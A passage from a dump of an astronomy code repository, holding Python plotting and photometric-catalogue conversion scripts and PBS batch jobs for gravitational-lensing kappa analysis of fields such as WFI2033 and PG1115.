%.3f (%.3f %.3f)\" % (np.median([medsum50W1[i][0],medsum50W2[i][0],medsum50W3[i][0],medsum50W4[i][0],medsum75W1[i][0],medsum75W2[i][0],medsum75W3[i][0],medsum75W4[i][0]]),np.median([medsum50W1[i],medsum50W2[i],medsum50W3[i],medsum50W4[i],medsum75W1[i],medsum75W2[i],medsum75W3[i],medsum75W4[i]]),std_inf[i],std_sup[i])\n ax.text(0.02, 0.1, s, fontsize=fontlabel+1, color='k',transform=ax.transAxes)\n print i,s\n if i == 0: plt.xlabel(r'$\\zeta_{gal}$', fontsize=fontabsciss)\n if i == 1: plt.xlabel(r'$\\zeta_{z}$', fontsize=fontabsciss)\n if i == 2: plt.xlabel(r'$\\zeta_{M_\\star}$', fontsize=fontabsciss)\n if i == 3: plt.xlabel(r'$\\zeta_{M^2_\\star}$', fontsize=fontabsciss)\n if i == 4: plt.xlabel(r'$\\zeta_{M^3_\\star}$', fontsize=fontabsciss)\n if i == 5: plt.xlabel(r'$\\zeta_{1/r}$', fontsize=fontabsciss)\n if i == 6: plt.xlabel(r'$\\zeta_{z/r}$', fontsize=fontabsciss)\n if i == 7: plt.xlabel(r'$\\zeta_{M_\\star/r}$', fontsize=fontabsciss)\n if i == 8: plt.xlabel(r'$\\zeta_{M^2_\\star/r}$', fontsize=fontabsciss)\n if i == 9: plt.xlabel(r'$\\zeta_{M^3_\\star/r}$', fontsize=fontabsciss)\n if i == 10: plt.xlabel(r'$\\zeta_{M^2_{\\star\\mathrm{,rms}}}$', fontsize=fontabsciss)\n if i == 11: plt.xlabel(r'$\\zeta_{M^3_{\\star\\mathrm{,rms}}}$', fontsize=fontabsciss)\n if i == 12: plt.xlabel(r'$\\zeta_{M^2_{\\star\\mathrm{,rms}}/r}$', fontsize=fontabsciss)\n if i == 13: plt.xlabel(r'$\\zeta_{M^3_{\\star\\mathrm{,rms}}/r}$', fontsize=fontabsciss)\n if i == 14: plt.xlabel(r'$\\zeta_\\mathrm{flexion}$', fontsize=fontabsciss)\n if i == 15: plt.xlabel(r'$\\zeta_\\mathrm{tidal}$', fontsize=fontabsciss)\n if i == 16: plt.xlabel(r'$\\zeta_\\mathrm{SIS}$', fontsize=fontabsciss)\n if i == 17: plt.xlabel(r'$\\zeta_\\mathrm{SIShalo}$', fontsize=fontabsciss)\n if i in [0,4,8,12,15]:\n plt.ylabel(\"Normalized counts\", fontsize=5)\n plt.tick_params(axis='x', labelsize=4)\n plt.tick_params(axis='y', labelsize=4)\n plt.setp(plt.xticks()[1], rotation=90)\n subplot = i+1\n #print \"finished subplot %d/18; fraction of points inside the < %s cut: \\n W1_50 %.3f\\n W2_50 %.3f\\n W3_50 %.3f\\n W4_50 %.3f\" % (subplot, limit, float(q_W1_50.size)/q_W1_50read[0].size, float(q_W2_50.size)/q_W2_50read[0].size, float(q_W3_50.size)/q_W3_50read[0].size, float(q_W4_50.size)/q_W4_50read[0].size)\n\nnp.savetxt('%s%s_weightedcountshist_%sarcsec_%sinner_%s_%s_%s_%s_%s%s_zgap%s_%s_%ssamplesW1_50%s.lst' % (root, lens, radius, inner, mag, mode, photz, detect, irac, handpicked, zinf, zsup, samples, specialtest), medsum50W1.T, fmt='%1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f')\nnp.savetxt('%s%s_weightedcountshist_%sarcsec_%sinner_%s_%s_%s_%s_%s%s_zgap%s_%s_%ssamplesW1_75%s.lst' % (root, lens, radius, inner, mag, mode, photz, detect, irac, handpicked, zinf, zsup, samples, specialtest), medsum75W1.T, fmt='%1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f')\nnp.savetxt('%s%s_weightedcountshist_%sarcsec_%sinner_%s_%s_%s_%s_%s%s_zgap%s_%s_%ssamplesW2_50%s.lst' % (root, lens, radius, inner, mag, mode, photz, detect, irac, handpicked, zinf, zsup, samples, specialtest), medsum50W2.T, fmt='%1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f')\nnp.savetxt('%s%s_weightedcountshist_%sarcsec_%sinner_%s_%s_%s_%s_%s%s_zgap%s_%s_%ssamplesW2_75%s.lst' % (root, lens, radius, inner, mag, mode, photz, detect, irac, handpicked, zinf, zsup, samples, specialtest), medsum75W2.T, fmt='%1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f')\nnp.savetxt('%s%s_weightedcountshist_%sarcsec_%sinner_%s_%s_%s_%s_%s%s_zgap%s_%s_%ssamplesW3_50%s.lst' % (root, lens, radius, inner, mag, mode, photz, detect, irac, handpicked, zinf, zsup, samples, specialtest), medsum50W3.T, fmt='%1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f')\nnp.savetxt('%s%s_weightedcountshist_%sarcsec_%sinner_%s_%s_%s_%s_%s%s_zgap%s_%s_%ssamplesW3_75%s.lst' % (root, lens, radius, inner, mag, mode, photz, detect, irac, handpicked, zinf, zsup, samples, specialtest), medsum75W3.T, fmt='%1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f')\nnp.savetxt('%s%s_weightedcountshist_%sarcsec_%sinner_%s_%s_%s_%s_%s%s_zgap%s_%s_%ssamplesW4_50%s.lst' % (root, lens, radius, inner, mag, mode, photz, detect, irac, handpicked, zinf, zsup, samples, specialtest), medsum50W4.T, fmt='%1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f')\nnp.savetxt('%s%s_weightedcountshist_%sarcsec_%sinner_%s_%s_%s_%s_%s%s_zgap%s_%s_%ssamplesW4_75%s.lst' % (root, lens, radius, inner, mag, mode, photz, detect, irac, handpicked, zinf, zsup, samples, specialtest), medsum75W4.T, fmt='%1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f')\n\nplt.subplots_adjust(left=None, bottom=0.1, right=None, top=0.95, wspace=0.4, hspace=0.6)\nplt.subplot(5,4,5)\nplt.legend(bbox_to_anchor=(5, -5), loc='lower right', borderaxespad=0., fontsize=10)\nplt.savefig('%s%s_weightedcountshist_%sarcsec_%sinner_%s_%s_%s_%s_%s%s_zgap%s_%s_%ssamples%s.png' % (root, lens, radius, inner, mag, mode, photz, detect, irac, handpicked, zinf, zsup, samples, specialtest), dpi=500)\n\n# compute the number of fields used\ntotal50 = 0\ntotal75 = 0\ngood50 = 0\ngood75 = 0\nlst = [x for x in os.listdir(root) if ('_24galphotmstar_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s_count%s.lst' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked,specialtest) in x)]\nfor i in range(len(lst)):\n str = open('%s/%s' %(root,lst[i]),'r').read()\n str = [x.strip() for x in str.split(\" \")]\n str_total50 = int(str[8])\n str_total75 = int(str[6][:-1])\n str_good50 = int(str[7])\n str_good75 = int(str[5])\n if i == 0:\n total50 = str_total50\n total75 = str_total75\n good50 = str_good50\n good75 = str_good75\n else:\n total50 += str_total50\n total75 += str_total75\n good50 += str_good50\n good75 += str_good75\n\nprint '50%: ', good50, '/', total50, ';', '75%: ', good75, '/', total75\nprint(\" --- %s seconds ---\" % (time.time() - start_time))\n\nprint 'Done!'\n" }, { "alpha_fraction": 0.6352829337120056, "alphanum_fraction": 0.7874464988708496, "avg_line_length": 62.727272033691406, "blob_id": "c576627a28201e43d12891f8c299f8f8007c505f", "content_id": "c99e896e1010d16530e2cfce5a48904383d4eac4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2103, "license_type": "no_license", "max_line_length": 117, "num_lines": 33, "path": "/python/scripts/NAOJ/batch2_insertstars.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q4\n#PBS -o Logb2.out\n#PBS -e Logb2.err\n#PBS -N 2\n#PBS -l mem=15gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /lfs08/rusucs/code/\n\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_2_0_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_2_1_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_2_2_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_2_3_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_2_4_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_2_5_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_2_6_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_2_7_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\n\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_2_0_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_2_1_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_2_2_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_2_3_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_2_4_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_2_5_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_2_6_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_2_7_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\n" }, { "alpha_fraction": 0.5395833253860474, "alphanum_fraction": 0.636904776096344, "avg_line_length": 48.411766052246094, "blob_id": "7f5bc7d964f6cc5eec4a88b5788a6c3072ae0d4d", "content_id": "d3a882ea1635e9ba3a6288a0901b9b0736b22254", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3360, "license_type": "no_license", "max_line_length": 130, "num_lines": 68, "path": "/python/plot_utilities/redshifthistwithgroups.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "##########################\n# Given a list of spectroscopic redshifts, plots the histograms and marks the groups previously identified\n##########################\n\n#from matplotlib.colors import LogNorm\n#import scipy.optimize as optimization\nfrom pylab import *\nimport numpy as np\n#ax=plt.subplot(111)\nzlim = 1.8\n#maglimit = 21\n#outlim = 0.15\n\nfig = plt.figure(figsize=(5,5))\nax1 = fig.add_subplot(1,1,1)\n#ax1.set(aspect=1)\nax1.set_aspect(1, adjustable='datalim')\nax = plt.subplot(1,1,1, sharex=ax1, sharey=ax1)\n\nz = np.loadtxt(\"/Users/cerusu/Dropbox/Davis_work/code/J1206/spec/J1206_specfromChrisandSDSSusethis.tab\", usecols=[4], unpack=True)\nplt.hist(z[z < zlim], bins = 72, color='k', histtype='step')\n\nz1 = 0.052; z1_size = 10; z1_ra = -133; z1_raerr = 178; z1_dec = 368; z1_decerr = 98\nz2 = 0.123; z2_size = 6; z2_ra = 59; z2_raerr = 203; z2_dec = -212; z2_decerr = 68\nz3 = 0.482; z3_size = 14; z3_ra = -230; z3_raerr = 67; z3_dec = -41; z3_decerr = 93\nz4 = 0.551; z4_size = 27; z4_ra = 127; z4_raerr = 98; z4_dec = -171; z4_decerr = 64\nz5 = 0.688; z5_size = 16; z5_ra = 92; z5_raerr = 68; z5_dec = -112; z5_decerr = 47\nz6 = 0.750; z6_size = 28; z6_ra = -18; z6_raerr = 49; z6_dec = 5; z6_decerr = 23\nz7 = 0.778; z7_size = 4; z7_ra = -227; z7_raerr = 30; z7_dec = -94; z7_decerr = 34\n\nplt.axvline(x=z1, color='k', linestyle='--')\nplt.axvline(x=z2, color='k', linestyle='--')\nplt.axvline(x=z3, color='k', linestyle='--')\nplt.axvline(x=z4, color='k', linestyle='--')\nplt.axvline(x=z5, color='k', linestyle='--')\nplt.axvline(x=z6, color='k', linestyle='--')\nplt.axvline(x=z7, color='k', linestyle='--')\n\n#x = x[abs(y) <= zlim]\n#y = y[abs(y) <= zlim]\n#plt.scatter(x,y, color='k')\n#plt.scatter(x, y)\ntxt1 = \"%.3f %s %s$\\pm$%s %s$\\pm$%s\" % (z1,z1_size,z1_ra,z1_raerr,z1_dec,z1_decerr)\ntxt2 = \"%.3f %s %s$\\pm$%s %s$\\pm$%s\" % (z2,z2_size,z2_ra,z2_raerr,z2_dec,z2_decerr)\ntxt3 = \"%.3f %s %s$\\pm$%s %s$\\pm$%s\" % (z3,z3_size,z3_ra,z3_raerr,z3_dec,z3_decerr)\ntxt4 = \"%.3f %s %s$\\pm$%s %s$\\pm$%s\" % (z4,z4_size,z4_ra,z4_raerr,z4_dec,z4_decerr)\ntxt5 = \"%.3f %s %s$\\pm$%s %s$\\pm$%s\" % (z5,z5_size,z5_ra,z5_raerr,z5_dec,z5_decerr)\ntxt6 = \"%.3f %s %s$\\pm$%s %s$\\pm$%s\" % (z6,z6_size,z6_ra,z6_raerr,z6_dec,z6_decerr)\ntxt7 = \"%.3f %s %s$\\pm$%s %s$\\pm$%s\" % (z7,z7_size,z7_ra,z7_raerr,z7_dec,z7_decerr)\n#stdout = \"scatter = %.3f\" % std\nplt.text(0.5, 0.9, txt1, fontsize=9, color='black', transform=ax.transAxes)\nplt.text(0.5, 0.8, txt2, fontsize=9, color='black', transform=ax.transAxes)\nplt.text(0.5, 0.7, txt3, fontsize=9, color='black', transform=ax.transAxes)\nplt.text(0.5, 0.6, txt4, fontsize=9, color='black', transform=ax.transAxes)\nplt.text(0.5, 0.5, txt5, fontsize=9, color='black', transform=ax.transAxes)\nplt.text(0.5, 0.4, txt6, fontsize=9, color='black', transform=ax.transAxes)\nplt.text(0.5, 0.3, txt7, fontsize=9, color='black', transform=ax.transAxes)\nplt.xlabel('spectroscopic redshift')\nplt.ylabel('number of galaxies')\nplt.xlim(0, zlim)\n#plt.ylim(0, zlim)\n#ax1.set_yticklabels(np.arange(0.0, zlim, 0.2))\n#ax1.set_xticklabels(np.arange(0.0, zlim, 0.2))\n#plt.subplots_adjust(bottom=0.1, left =0.2, right=0.9, top=0.90, wspace=0, hspace=0)\n#plt.tight_layout()\n#fig.text(0.05, 0.5, 'photo-z', ha='center', va='center', size='20', rotation='vertical')\n#plt.title('HE0435 ugri specz-photz')\nplt.savefig('/Users/cerusu/Dropbox/Davis_work/code/J1206/speczhist.pdf')\n" }, { "alpha_fraction": 0.6287500262260437, "alphanum_fraction": 0.7537500262260437, "avg_line_length": 60.53845977783203, "blob_id": "8a734e190c96b02b8cd33d41ddb931a9833d23ad", "content_id": "d797d208199480c2826d14500d8d777051c1f2c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 800, "license_type": "no_license", "max_line_length": 189, "num_lines": 13, "path": "/python/catalogue_utilities/combine_distributions.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Use to combine a certain kappa distribution in case it could not be computed at once from the 64 MS fields. Normalizes before summing. \n\nimport numpy as np\n\nroot = \"/Users/cerusu/Dropbox/\"\n\ndata1 = np.loadtxt(\"%skappahist_WFI2033_5innermask_nobeta_zgap0.61_0.71_fiducial_120_gal_120_gamma_120_oneoverr_45_gal_23_meds_increments2_2_2_2_part1.cat\" % root, usecols=[0], unpack=True)\ndata2 = np.loadtxt(\"%skappahist_WFI2033_5innermask_nobeta_zgap0.61_0.71_fiducial_120_gal_120_gamma_120_oneoverr_45_gal_23_meds_increments2_2_2_2_part2.cat\" % root, usecols=[0], unpack=True)\n\ndata1 = data1 / np.sum(data1)\ndata2 = data2 / np.sum(data2)\n\nnp.savetxt(\"%skappahist_WFI2033_5innermask_nobeta_zgap0.61_0.71_fiducial_120_gal_120_gamma_120_oneoverr_45_gal_23_meds_increments2_2_2_2.cat\" % root, data1 + data2)\n" }, { "alpha_fraction": 0.6746323704719543, "alphanum_fraction": 0.7665441036224365, "avg_line_length": 26.200000762939453, "blob_id": "7369e44ddccfc644ea09ec30d9aaea5b37d18c59", "content_id": "ea5beecbea706135e5899416d3b92a8b4e8f52ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 544, "license_type": "no_license", "max_line_length": 77, "num_lines": 20, "path": "/python/scripts/NAOJ/batch_infersim5.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log5s.out\n#PBS -e Log5s.err\n#PBS -N 5s\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappasimbias.py WFI2033 5 45 23 meds gal gamma oneoverr mass\npython inferkappasimbias.py WFI2033 5 120 23 meds gal gamma oneoverr mass\npython inferkappasimbiasphil.py WFI2033 5 45 23 meds gal gamma oneoverr mass\npython inferkappasimbiasphil.py WFI2033 5 120 23 meds gal gamma oneoverr mass\n" }, { "alpha_fraction": 0.5455713868141174, "alphanum_fraction": 0.6018929481506348, "avg_line_length": 58.43055725097656, "blob_id": "9bd08f108ac4c95e75d9a51d4355f32c100e6e1d", "content_id": "98614cc3c285facea99c5a7a60bfa15cb3eaab39", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8558, "license_type": "no_license", "max_line_length": 409, "num_lines": 144, "path": "/python/catalogue_utilities/converttobpz_ugrizYJHK.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "##########################\n# The code is used to convert raw matched photometric catalogues (with matched PSFs) into BPZ-expected input files, except that the ID, image/world coordinates, flux radii and flags are still included. The code uses the measured 1-sigma mag limits to treat non-detections (not yet non-exposures). The code applies a MAG_ISO -> MAG_AUTO conversion. The conversion is as follows:\n# for detections in i+r: auto_x = iso_x + average(auto_r_noconv - iso_r, auto_i_noconv - iso_i)\n# for detections in i: auto_x = iso_x + auto_i_noconv - iso_i\n# This expresion is useful to find total mags for photoz (with luminosity priors) and stellar mass computation, but ignores color gradients, as described in Erben et al. 2014\n##########################\n\n# Careful, because the columns ID changes depending on the input file; also, change the 1-sigma detection limits as appropriate\n# Before running, make sure that the mag_iso_i columns in the convolved frame contains no 99 or -99, because it is used for the conversions; in the case of detections in ir only, also mag_iso_r\n\nimport numpy as np \n\nfile = \"/Users/eduardrusu/Desktop/WFI2033/WFI2033analysis/rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23.cat\"\n#file = \"/Users/eduardrusu/Desktop/WFI2033/WFI2033analysis/i_detect_i_and_ir_rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23.cat\"\n\n# I calculated the 5-sigma limits, now convert to 1-sigma\nlimit_u = 24.25 + 1.74 # AB; u-band is not updated\nlimit_g = 23.77 + 1.74 # AB\nlimit_r = 23.81 + 1.74 # AB\nlimit_i = 23.18 + 1.74 # AB\nlimit_z = 22.91 + 1.74 # AB\nlimit_Y = 21.40 + 1.74 # AB\nlimit_J = 20.63 + 1.74 # Vega\nlimit_H = 19.52 + 1.74 # Vega\nlimit_K = 18.87 + 1.74 # Vega\n\nif \"detect_i_and_ir\" in file:\n xpix = 0\n ypix = 1\n xwcs = 2\n ywcs = 3\n id = 4 # detections in i\n flx_rad = 8 # measurement in i, detection in i\n flg = 16\n auto_i_noconv_detecti = 12\n auto_i_noconv_detecti_err = 13\n iso_u = 41\n iso_u_err = 42\n iso_g = 45\n iso_g_err = 46\n iso_r = 49\n iso_r_err = 50\n iso_i = 53\n iso_i_err = 54\n iso_z = 57\n iso_z_err = 58\n iso_Y = 61\n iso_Y_err = 62\n iso_J = 65\n iso_J_err = 66\n iso_H = 69\n iso_H_err = 70\n iso_K = 73\n iso_K_err = 74\nelse:\n xpix = 0\n ypix = 1\n xwcs = 2\n ywcs = 3\n id = 4 # detections in i\n flx_rad = 17 # measurement in i\n flg = 13\n auto_r_noconv = 9\n auto_r_noconv_err = 10\n auto_i_noconv = 18\n auto_i_noconv_err = 19\n iso_u = 24\n iso_u_err = 25\n iso_g = 28\n iso_g_err = 29\n iso_r = 32\n iso_r_err = 33\n iso_i = 36\n iso_i_err = 37\n iso_z = 40\n iso_z_err = 41\n iso_Y = 44\n iso_Y_err = 45\n iso_J = 48\n iso_J_err = 49\n iso_H = 52\n iso_H_err = 53\n iso_K = 56\n iso_K_err = 57\n\ndata = np.loadtxt(file,unpack=True)\n\n# m = 99.0, dm = 28.4 -- example of a non-detection: dm = 1-sigma detection limit\ndata[iso_u_err][data[iso_u] > limit_u] = limit_u\ndata[iso_u][data[iso_u] > limit_u] = 99.0\ndata[iso_g_err][data[iso_g] > limit_g] = limit_g\ndata[iso_g][data[iso_g] > limit_g] = 99.0\ndata[iso_r_err][data[iso_r] > limit_r] = limit_r\ndata[iso_r][data[iso_r] > limit_r] = 99.0\ndata[iso_i_err][data[iso_i] > limit_i] = limit_i\ndata[iso_i][data[iso_i] > limit_i] = 99.0\ndata[iso_z_err][data[iso_z] > limit_z] = limit_z\ndata[iso_z][data[iso_z] > limit_z] = 99.0\ndata[iso_Y_err][data[iso_Y] > limit_Y] = limit_Y\ndata[iso_Y][data[iso_Y] > limit_Y] = 99.0\ndata[iso_J_err][data[iso_J] > limit_J] = limit_J\ndata[iso_J][data[iso_J] > limit_J] = 99.0\ndata[iso_H_err][data[iso_H] > limit_H] = limit_H\ndata[iso_H][data[iso_H] > limit_H] = 99.0\ndata[iso_K_err][data[iso_K] > limit_K] = limit_K\ndata[iso_K][data[iso_K] > limit_K] = 99.0\n\n# implement the iso -> auto correction, but only for mags != 99,-99\nif \"detect_i_and_ir\" in file:\n isoauto = data[auto_i_noconv_detecti] - data[iso_i]\n isoauto[np.abs(data[iso_i]) == 99.0] = 0\n data[iso_u][np.abs(data[iso_u]) != 99.0] = data[iso_u][np.abs(data[iso_u]) != 99.0] + isoauto[np.abs(data[iso_u]) != 99.0]\n data[iso_g][np.abs(data[iso_g]) != 99.0] = data[iso_g][np.abs(data[iso_g]) != 99.0] + isoauto[np.abs(data[iso_g]) != 99.0]\n data[iso_r][np.abs(data[iso_r]) != 99.0] = data[iso_r][np.abs(data[iso_r]) != 99.0] + isoauto[np.abs(data[iso_r]) != 99.0]\n data[iso_i][np.abs(data[iso_i]) != 99.0] = data[iso_i][np.abs(data[iso_i]) != 99.0] + isoauto[np.abs(data[iso_i]) != 99.0]\n data[iso_z][np.abs(data[iso_z]) != 99.0] = data[iso_z][np.abs(data[iso_z]) != 99.0] + isoauto[np.abs(data[iso_z]) != 99.0]\n data[iso_Y][np.abs(data[iso_Y]) != 99.0] = data[iso_Y][np.abs(data[iso_Y]) != 99.0] + isoauto[np.abs(data[iso_Y]) != 99.0]\n data[iso_J][np.abs(data[iso_J]) != 99.0] = data[iso_J][np.abs(data[iso_J]) != 99.0] + isoauto[np.abs(data[iso_J]) != 99.0]\n data[iso_H][np.abs(data[iso_H]) != 99.0] = data[iso_H][np.abs(data[iso_H]) != 99.0] + isoauto[np.abs(data[iso_H]) != 99.0]\n data[iso_K][np.abs(data[iso_K]) != 99.0] = data[iso_K][np.abs(data[iso_K]) != 99.0] + isoauto[np.abs(data[iso_K]) != 99.0]\nelse:\n isoauto = np.mean([data[auto_i_noconv] - data[iso_i],data[auto_r_noconv] - data[iso_r]],axis=0)\n isoauto[np.abs(data[iso_i]) == 99.0] = 0\n isoauto[(np.abs(data[iso_i]) != 99.0) & ((np.abs(data[auto_r_noconv]) == 99.0) | (np.abs(data[iso_r]) == 99.0))] = data[auto_i_noconv][(np.abs(data[iso_i]) != 99.0) & ((np.abs(data[auto_r_noconv]) == 99.0) | (np.abs(data[iso_r]) == 99.0))] - data[iso_i][(np.abs(data[iso_i]) != 99.0) & ((np.abs(data[auto_r_noconv]) == 99.0) | (np.abs(data[iso_r]) == 99.0))]\n data[iso_u][np.abs(data[iso_u]) != 99.0] = data[iso_u][np.abs(data[iso_u]) != 99.0] + isoauto[np.abs(data[iso_u]) != 99.0]\n data[iso_g][np.abs(data[iso_g]) != 99.0] = data[iso_g][np.abs(data[iso_g]) != 99.0] + isoauto[np.abs(data[iso_g]) != 99.0]\n data[iso_r][np.abs(data[iso_r]) != 99.0] = data[iso_r][np.abs(data[iso_r]) != 99.0] + isoauto[np.abs(data[iso_r]) != 99.0]\n data[iso_i][np.abs(data[iso_i]) != 99.0] = data[iso_i][np.abs(data[iso_i]) != 99.0] + isoauto[np.abs(data[iso_i]) != 99.0]\n data[iso_z][np.abs(data[iso_z]) != 99.0] = data[iso_z][np.abs(data[iso_z]) != 99.0] + isoauto[np.abs(data[iso_z]) != 99.0]\n data[iso_Y][np.abs(data[iso_Y]) != 99.0] = data[iso_Y][np.abs(data[iso_Y]) != 99.0] + isoauto[np.abs(data[iso_Y]) != 99.0]\n data[iso_J][np.abs(data[iso_J]) != 99.0] = data[iso_J][np.abs(data[iso_J]) != 99.0] + isoauto[np.abs(data[iso_J]) != 99.0]\n data[iso_H][np.abs(data[iso_H]) != 99.0] = data[iso_H][np.abs(data[iso_H]) != 99.0] + isoauto[np.abs(data[iso_H]) != 99.0]\n data[iso_K][np.abs(data[iso_K]) != 99.0] = data[iso_K][np.abs(data[iso_K]) != 99.0] + isoauto[np.abs(data[iso_K]) != 99.0]\n\nfileout = file[:-4] + \"_forbpz_NEW.cat\"\n\nif \"detect_i_and_ir\" in file:\n str = \"X_IMAGE Y_IMAGE X_WORLD Y_WORLD MAG_AUTO_i_noconv_detect_i MAG_AUTO_ERR_i_noconv_detect_i FLUX_RADIUS_i_noconv_detect_i FLAG_i_noconv_detect_i #ID u u_err g g_err r r_err i i_err z z_err Y Y_err J J_err H H_err K K_err\"\n dataout = np.c_[data[xpix],data[ypix],data[xwcs],data[ywcs],data[auto_i_noconv_detecti],data[auto_i_noconv_detecti_err],data[flx_rad],data[flg],data[id],data[iso_u],data[iso_u_err],data[iso_g],data[iso_g_err],data[iso_r],data[iso_r_err],data[iso_i],data[iso_i_err],data[iso_z],data[iso_z_err],data[iso_Y],data[iso_Y_err],data[iso_J],data[iso_J_err],data[iso_H],data[iso_H_err],data[iso_K],data[iso_K_err]]\n np.savetxt(fileout,dataout,header=str,fmt='%.4f \\t %.4f \\t %.9f \\t %.9f \\t %.2f \\t %.2f \\t %.3f \\t %d \\t %d \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f')\nelse:\n str = \"X_IMAGE Y_IMAGE X_WORLD Y_WORLD MAG_AUTO_i_noconv MAG_AUTO_ERR_i_noconv FLUX_RADIUS_i_noconv FLAG #ID u u_err g g_err r r_err i i_err z z_err Y Y_err J J_err H H_err K K_err\"\n dataout = np.c_[data[xpix],data[ypix],data[xwcs],data[ywcs],data[auto_i_noconv],data[auto_i_noconv_err],data[flx_rad],data[flg],data[id],data[iso_u],data[iso_u_err],data[iso_g],data[iso_g_err],data[iso_r],data[iso_r_err],data[iso_i],data[iso_i_err],data[iso_z],data[iso_z_err],data[iso_Y],data[iso_Y_err],data[iso_J],data[iso_J_err],data[iso_H],data[iso_H_err],data[iso_K],data[iso_K_err]]\n np.savetxt(fileout,dataout,header=str,fmt='%.4f \\t %.4f \\t %.9f \\t %.9f \\t %.2f \\t %.2f \\t %.3f \\t %d \\t %d \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f')\n" }, { "alpha_fraction": 0.7010309100151062, "alphanum_fraction": 0.8247422575950623, "avg_line_length": 96, "blob_id": "e7605a9114c29fce199fa8963a6e30344fb2edfb", "content_id": "a98c5e301c0f638488108638db6ff5c3b69bc614", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 776, "license_type": "no_license", "max_line_length": 96, "num_lines": 8, "path": "/python/scripts/NAOJ/script_extractMillennium4.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": 